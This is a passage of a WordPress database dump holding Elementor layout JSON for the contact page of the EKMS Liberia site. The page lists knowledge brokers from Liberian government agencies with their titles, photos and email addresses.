href=\\\"mailto:kingmamatu@gmail.com\\\">kingmamatu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9d523fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d8aba5e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J. Josiah N. Domah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:josiahdomah@@gmail.com\\\">josiahdomah@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"be454e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b64ac2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Emmanuel Ballah <\\/strong><br \\/>MGCSP<br \\/><a href=\\\"mailto:ballah_@yahoo.com\\\">ballah_@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(24580,3629,'_elementor_edit_mode','builder'),(24581,3629,'_elementor_template_type','wp-page'),(24582,3629,'_elementor_version','3.0.16'),(24583,3629,'_wp_page_template','default'),(24584,3629,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d8ecb8\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_i